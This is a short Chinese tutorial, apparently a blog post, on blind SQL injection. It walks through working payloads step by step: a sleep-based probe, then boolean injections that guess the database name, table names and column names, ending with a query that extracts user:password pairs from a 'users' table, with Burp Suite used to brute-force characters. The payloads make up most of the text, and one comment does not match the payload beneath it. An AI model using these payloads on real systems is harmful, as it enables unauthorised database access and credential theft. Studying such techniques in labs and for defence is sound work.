【网络安全】SQL注入--布尔盲注

判断是否存在sql注入

输入内容

1' and sleep(5) -- 

返回结果存在5s延迟故存在sql注入漏洞

获取数据库名称

使用说明

if(1>2,1,0) # 判断条件是否成立。成立返回1，不成立返回0
substring('abcd',1,3)  #截取字符串第一位开始的三个字符

1.判断数据库长度

1' and if(length(database())=4,1,0) -- 

2.判断数据库名称

1' and if(substring(database(),2,1)='v',1,0) -- 
# 截取数据库的第一位判断是否为d

burpsuite协助破解设置

3.判断表名

1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='g',1,0) -- 

使用burpsuite

4. 判断列名

1' and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 1,1),1,1)='l',1,0) -- 

5. 获取账号密码

1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 1),1,1)='a',1,0) --